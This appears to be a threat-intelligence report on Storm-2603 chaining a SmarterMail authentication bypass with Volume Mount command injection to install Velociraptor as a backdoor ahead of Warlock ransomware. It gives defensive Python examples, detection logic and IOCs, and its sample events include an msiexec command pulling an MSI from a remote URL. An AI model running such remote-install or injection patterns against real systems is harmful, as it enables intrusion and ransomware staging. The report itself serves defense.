Editor’s note: This report was authored by Alexa Feminella

Key Points

  • ReliaQuest identified activity likely linked to “Storm-2603” involving exploitation of a critical SmarterMail vulnerability (CVE-2026-23760) to bypass authentication and stage “Warlock” ransomware on internet-facing systems.

  • The threat actor blends in by abusing legitimate administrative features and deploying legitimate forensic tooling to establish persistence and prepare follow-on actions.

  • Defenders should upgrade to SmarterMail Build 9511 or later immediately and strictly isolate mail servers to block lateral movement attempts used to deploy ransomware.


ReliaQuest has identified active exploitation of a vulnerability in SmarterTools SmarterMail email server software (CVE-2026-23760), attributed with moderate-to-high confidence to “Storm-2603.” This appears to be the first observed exploitation linking the China-based actor to the vulnerability as an entry point for its “Warlock” ransomware operations.

While this vulnerability allows attackers to bypass authentication and reset administrator passwords, Storm-2603 chains this access with the software’s built-in “Volume Mount” feature to gain full system control. Upon entry, the group installs Velociraptor, a legitimate digital forensics tool it has used in previous campaigns, to maintain access and set the stage for ransomware.

This activity coincides with a February 5, 2026 CISA warning that ransomware actors are exploiting a second SmarterMail vulnerability (CVE-2026-24423). We observed probes for this second vulnerability alongside the Storm-2603 activity. However, because these attempts originated from different infrastructure, it remains unclear whether Storm-2603 is rotating IP addresses or a separate group is capitalizing on the same window.

Specific attribution matters less than the operational reality: Internet-facing servers are being targeted by multiple vectors simultaneously. Patching one entry point is insufficient if the adversary is actively pivoting to another or—worse—has already established persistence using legitimate tools.

In this report, we:

  • Break down the full attack chain, from password reset API exploitation to living-off-the-land persistence.

  • Analyze the overlap with CISA’s warning regarding the second vulnerability (CVE-2026-24423).

  • Assess why attackers chain administrative features instead of relying solely on direct exploits.

  • Provide actionable recommendations to mitigate these vulnerabilities and hunt for pre-encryption indicators of compromise.

Pulling the Thread on Storm-2603

In this section, we unpack the tradecraft observed across the attack chain. Storm-2603 gains entry by exploiting CVE-2026-23760, then pivots to execution by abusing a built-in administrative capability, and finally leans on legitimate forensic tooling to support persistence and reduce suspicion.

By design, email server software is often deployed as internet-facing infrastructure to support webmail and SMTP traffic. That constant exposure makes these systems easy targets for opportunistic scanning and repeated probing. In many cases, there’s little to no obvious lead-up for defenders to spot before exploitation attempts begin.

Initial Access

The attack begins with the exploitation of CVE-2026-23760, which allows the attacker to reset the administrator password through the password reset API. Although the force password reset request does take the target user’s old password as input, vulnerable versions (prior to Build 9511) fail to verify whether that input is correct. This means the system accepts any value, even an incorrect entry, as valid proof of identity.

This allows an unauthenticated attacker to overwrite the credentials of any user, effectively bypassing the entire login process without possessing a single valid credential. While this provides total control over the mail server application, it does not automatically provide the ability to run code on the underlying operating system. To bridge the gap between application control and full system compromise, the attacker must pivot to a secondary technique.
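The flaw described above is a missing comparison, not a cryptographic weakness. The following Python is an added illustration written for this report's readers, not SmarterMail's code or ReliaQuest's: a hypothetical in-memory credential store with a forced password reset implemented twice, once in the flawed pattern (the old password is accepted as an input but never checked) and once hardened (the old password must verify before the credential is overwritten). The store, the function names and the PBKDF2 parameters are all assumptions made for the example.

```python
import hashlib
import hmac
import os

# Hypothetical in-memory credential store, written for this example; it is not
# SmarterMail's code. Passwords are stored as salted PBKDF2-HMAC-SHA256 hashes.
def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


class UserStore:
    def __init__(self):
        self.users = {}

    def set_password(self, username, password):
        salt = os.urandom(16)
        self.users[username] = {"salt": salt, "hash": _hash(password, salt)}

    def verify(self, username, password):
        record = self.users.get(username)
        if record is None:
            return False
        # Constant-time comparison of the derived hash against the stored one.
        return hmac.compare_digest(_hash(password, record["salt"]), record["hash"])


def force_reset_vulnerable(store, username, old_password, new_password):
    """The flawed pattern: old_password is accepted as an input but never
    compared to anything, so any value passes as proof of identity."""
    if username not in store.users:
        return False
    store.set_password(username, new_password)   # old_password is ignored
    return True


def force_reset_hardened(store, username, old_password, new_password):
    """Verify the presented old password before overwriting the credential.
    A real endpoint would also require an authenticated session for the target
    account (or an admin session for an admin-only flow); that check is out of
    scope for this example."""
    if not store.verify(username, old_password):   # also fails for unknown users
        return False
    store.set_password(username, new_password)
    return True
```

When auditing a reset or "change password" endpoint, the check to make is exactly the one the hardened version adds: every parameter the request presents as proof of identity must be compared against the stored credential, and the comparison must fail closed when the account does not exist.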

Execution

At this point, the attacker controls the mail software, but they need to control the underlying Windows server to install their backdoor. To bridge this gap between “App Admin” and “System Execution,” the attackers abuse SmarterMail's Volume Mount feature.

This feature is designed to let administrators specify commands for mounting network drives. However, because the application trusts the administrator input, it doesn’t filter what commands can be entered.

Storm-2603 exploits this by injecting arbitrary malicious commands instead of legitimate mount instructions. This is critical because the commands inherit the high-level permissions of the SmarterMail service itself, effectively handing the attacker full administrative control over the server's operating system.

This chaining of the API exploit with Volume Mount abuse highlights Storm-2603’s sophistication: when the initial vulnerability didn’t provide direct remote code execution (RCE), the group leveraged built-in application logic to manufacture it. This step is what transforms a data breach into a ransomware staging event, giving the group the ability to download the payloads needed to lock down the network.
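The Volume Mount abuse is a command injection through trusted administrator input. As an added example that is not SmarterMail's code or ReliaQuest's, the Python below shows a hypothetical helper for an administrator-facing "mount network drive" feature in both forms: the flawed one splices the drive letter and share into a single command string handed to a shell, and the hardened one validates both fields against a strict shape and returns an argv list for subprocess.run with shell=False, so no shell ever parses the values. The function names, the regular expressions and the use of `net use` are assumptions made for the example.

```python
import re

# Hypothetical helper for an administrator-facing "mount network drive"
# feature, written for this example; it is not SmarterMail's code.
DRIVE_RE = re.compile(r"^[A-Z]:$")
# A plain UNC path: \\server\share with optional sub-folders, no metacharacters.
UNC_RE = re.compile(r"^\\\\[A-Za-z0-9._-]+\\[A-Za-z0-9._$-]+(?:\\[A-Za-z0-9._ -]+)*$")


def build_mount_unsafe(drive, share):
    """The flawed pattern: input trusted because it came from an administrator
    is spliced into one command string destined for cmd.exe /c, so '&', '|'
    and similar characters inside the share value become additional commands
    run with the service account's privileges."""
    return f"net use {drive} {share}"


def build_mount_safe(drive, share):
    """Validate both fields against a strict shape and return an argv list to
    be passed to subprocess.run(argv, shell=False); no shell parses it."""
    if not DRIVE_RE.fullmatch(drive):
        raise ValueError(f"invalid drive letter: {drive!r}")
    if not UNC_RE.fullmatch(share):
        raise ValueError(f"share is not a plain UNC path: {share!r}")
    return ["net", "use", drive, share]


if __name__ == "__main__":
    print(build_mount_unsafe("Z:", r"\\fs01\share & echo injected"))
    print(build_mount_safe("Z:", r"\\fs01\share\reports"))
```

The argv form removes the shell from the path entirely, and the allowlist regex rejects anything that is not a plain UNC path. Independently of either fix, running the mail service under a dedicated low-privilege account limits what an injected command could do, since the report notes that injected commands inherit the permissions of the SmarterMail service itself.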

Persistence

Once RCE is achieved, the attack pattern aligns perfectly with established Storm-2603 tradecraft. The attackers abuse the Windows Installer (msiexec) to download a malicious payload (v4.msi) from Supabase, a legitimate cloud-based backend platform.

To initiate this download, the attacker relies on the compromised SmarterMail service itself. We observed the legitimate SmarterMail process MailService.exe spawning a command shell (cmd.exe) to execute the request. By piggybacking on these legitimate system processes, the attackers mask the malicious download as routine system activity.
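The two behaviours just described, a shell spawned by MailService.exe and msiexec installing a package from a remote URL, are both visible in process-creation telemetry. The Python below is an added example, not ReliaQuest detection content or SmarterMail code: it runs two simple detections over constructed Sysmon-style process-creation events modelled on the chain in the report. The install path of MailService.exe, the hostname and the file paths in the sample events are placeholders, not the report's IOCs.

```python
from urllib.parse import urlparse

# Constructed Sysmon-style process-creation events (Event ID 1) modelled on the
# chain in the report: MailService.exe spawns cmd.exe, which runs msiexec to
# fetch an MSI from a cloud backend. Paths and the hostname are placeholders.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files (x86)\SmarterTools\SmarterMail\Service\MailService.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c msiexec /i https://example-project.supabase.co/storage/v1/object/public/x/v4.msi /qn"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i https://example-project.supabase.co/storage/v1/object/public/x/v4.msi /qn"},
    # Benign: a local package installed by the Windows Installer service.
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Temp\vendor-update.msi /qn"},
    # Benign: the mail service starting another instance of itself.
    {"ParentImage": r"C:\Program Files (x86)\SmarterTools\SmarterMail\Service\MailService.exe",
     "Image": r"C:\Program Files (x86)\SmarterTools\SmarterMail\Service\MailService.exe",
     "CommandLine": r"MailService.exe"},
]

MAIL_SERVICE = "mailservice.exe"      # SmarterMail service binary named in the report
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
INSTALL_SWITCHES = {"/i", "-i", "/package", "/a"}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def remote_msi_source(cmdline):
    """Hostname if an msiexec install switch is followed by an http(s) URL, else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in INSTALL_SWITCHES:
            url = urlparse(tokens[i + 1].strip('"'))
            if url.scheme in ("http", "https") and url.hostname:
                return url.hostname
    return None


def classify(event):
    """Return the names of the detections that fire for one event."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    findings = []
    # Signal 1: the mail service should never need an interactive shell.
    if parent == MAIL_SERVICE and image in SHELLS:
        findings.append("mail-service-spawned-shell")
    # Signal 2: msiexec pulling its package over HTTP(S) instead of from disk.
    if "msiexec" in cmdline.lower():
        host = remote_msi_source(cmdline)
        if host:
            findings.append(f"msiexec-remote-install:{host}")
    return findings


def detect(events):
    """Indexes of events with at least one finding, in input order."""
    return [i for i, ev in enumerate(events) if classify(ev)]


if __name__ == "__main__":
    for i in detect(SAMPLE_EVENTS):
        print(i, classify(SAMPLE_EVENTS[i]))
```

The first signal is the higher-value one because it does not depend on the payload's hosting: it fires whether the download comes from Supabase, GitHub or the next platform the group rotates to. The second signal catches the download itself and surfaces the hostname so it can be compared against the egress allowlist for the server.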

In previous Warlock campaigns, the group relied on GitHub to host Microsoft Installer (MSI) payloads rather than Supabase. The shift to Supabase likely represents a calculated infrastructure rotation: By moving to a fresh, high-reputation domain, they bypass the blocklists and detection logic defenders built against their previous attacks.

Command-and-Control

The MSI file installs Velociraptor, which the attackers configure for command-and-control (C2). Because Velociraptor is a legitimate tool used by security teams, it blends into administrative activity and is less likely to trigger alerts. This establishes a persistent backdoor for the final stage of the attack, creating the conditions for what we assess was highly likely intended to be Warlock ransomware deployment.

Although no ransomware executable was deployed during this attack, the tradecraft matches confirmed Warlock ransomware attacks down to the specific tactics, techniques, and procedures (TTPs), including the use of MSI installers and of Velociraptor as a C2 tool, indicating that this attack was almost certainly intercepted in the staging phase.

Two Paths to the Same Outcome

During our investigation, we observed ConnectToHub API calls consistent with the exploitation method associated with CVE-2026-24423, the separate vulnerability CISA warned about. These requests originated from infrastructure distinct from the Storm-2603 activity linked to CVE-2026-23760, suggesting the server was likely being tested by multiple threat actors or automated scanning/exploitation tooling in the same time window.

Taken together, the activity shows how these two vulnerabilities converge on a similar outcome. CVE-2026-23760 grants unauthenticated administrative access via the password reset API, which can then be chained with manual abuse of mounting logic to reach code execution. CVE-2026-24423, by contrast, appears to provide a more direct API path to that same execution logic. Because we observed artifacts for both vectors—password resets (confirming the auth bypass) and ConnectToHub calls (consistent with the direct RCE)—it is realistically possible the attacker used the auth bypass as the primary method while multiple other vectors were tested during the same window.

While this makes it hard to discern which vulnerability was actually used to stage Warlock, one thing is certain: the presence of password reset events shows the server accepted the request and executed the reset workflow, confirming successful exploitation of CVE-2026-23760. For CVE-2026-24423, we observed only ConnectToHub API calls, which indicate probing or attempted exploitation but do not, on their own, prove success.

Accordingly, we assess CVE-2026-23760 was the most likely primary access vector, with CVE-2026-24423 reflecting parallel probing or opportunistic exploitation attempts against the same server.

What We Take from This

While CVE-2026-24423 may provide a more direct path to RCE, we are observing active exploitation of CVE-2026-23760 as a multi-step chain that could still culminate in system-level compromise. The fact that attackers are pursuing this workflow suggests it is a viable alternative path to execution—potentially because it can be blended into normal administrative activity. By abusing legitimate features (password resets and drive mounting) instead of relying solely on a single “noisy” exploit primitive, operators may reduce the effectiveness of detections tuned specifically for known RCE patterns.

This pace of weaponization is consistent with ransomware operators rapidly analyzing vendor fixes and developing working tradecraft shortly after release. The tradecraft mirrors that of aggressive groups like “Black Basta,” focusing on rapid lateral movement to escalate from a single compromised server to domain-wide extortion. Given ransomware is the assessed objective, defenders should assume any unpatched, internet-facing SmarterMail instance is being actively targeted.

More broadly, this issue is not unique to SmarterMail. It forms part of a wider trend where adversaries target edge appliances (VPNs, mail servers, or file transfer gateways) to gain an initial foothold, then immediately switch to living-off-the-land tactics to hide their lateral movement. The edge device is the entry point; the larger risk is what attackers can do with legitimate tools and administrative capabilities once inside.

Defenders cannot simply patch the “critical” RCE bug and ignore the authentication bypass. Both pathways can lead to full system compromise, and both are being actively tested by ransomware groups right now.

Step Up Your Defenses Against Emerging Exploitation

Your Action Plan

Storm-2603’s patch-to-exploit speed suggests organizations’ response window is measured in days. Enterprises should patch both CVE-2026-23760 and CVE-2026-24423 as a priority. However, because this attack abuses legitimate tools for persistence, patching alone may not remove an adversary who is already inside. The actions below focus on rapid remediation, limiting lateral movement, and cutting off C2.

  • Upgrade Immediately: Upgrade all SmarterTools SmarterMail instances to Build 9511 or later to close the vulnerability gap.

  • Isolate the Server: Segment the mail server from the rest of the internal network (DMZ). A compromise of the mail server should not provide a direct path to the domain controller or critical internal assets.

  • Restrict Outbound Traffic: Implement strict outbound firewall rules. The mail server should only be allowed to communicate via necessary mail protocols (SMTP, IMAP, POP3). Block all other outbound traffic, specifically to cloud hosting providers or unknown IP addresses, to sever potential C2 channels.

ReliaQuest’s Approach

ReliaQuest GreyMatter equips customers with the tools to quickly detect, contain, investigate, and remediate the TTPs outlined throughout this report, including:

GreyMatter Transit: Unlike traditional tools that rely on post-event analysis, GreyMatter Transit detects attacks in motion by identifying suspicious msiexec activity and unauthorized network connections—such as downloads from unexpected cloud platforms like Supabase—before they are lost in the noise. This enables real-time visibility into living-off-the-land tactics, allowing defenders to disrupt the staging phase before ransomware is deployed.

Agentic AI: After an initial alert—such as a suspicious process spawning from MailService.exe—Agentic AI investigates the entire attack chain. It correlates the initial API exploitation with subsequent system activity, automatically verifying whether tools like Velociraptor were installed. It can then respond by containing the compromised server and generating a complete incident ticket, handling the full incident lifecycle in minutes without waiting for manual analysis.

Detection Rules: ReliaQuest continuously updates detection content to match attacker behavior. Organizations should deploy GreyMatter’s detection rules and Automated Response Playbooks to minimize the risk of compromise from authentication bypass attempts and the abuse of legitimate administrative features to execute malicious code.

IOCs

Artifact                                  Details
----------------------------------------  ----------
auth.qgtxtebl.workers[.]dev               Domain
vdfccjpnedujhrzscjtq.supabase[.]co        Domain
2-api.mooo[.]com                          Domain
162.252.198[.]197                         IP Address
199.217.99[.]93                           IP Address
157.245.156[.]118                         IP Address
45.127.35[.]186                           IP Address
178.128.103[.]218                         IP Address